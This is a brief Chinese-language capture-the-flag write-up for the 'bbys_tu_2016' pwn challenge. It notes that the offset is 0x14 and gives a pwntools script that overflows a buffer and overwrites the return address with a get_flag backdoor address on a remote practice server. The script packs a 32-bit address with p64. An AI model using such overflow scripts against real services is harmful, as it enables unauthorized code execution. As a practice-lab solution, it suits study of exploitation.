bbys_tu_2016
查看保护
溢出有后门,ida这次分析的不准确,在pwndbg里面动调一下得到偏移为0x14
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 27430)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
get_flag = 0x804856D
p1 = b'a' * (0x14 + 4) + p64(get_flag)
r.sendline(p1)
r.interactive()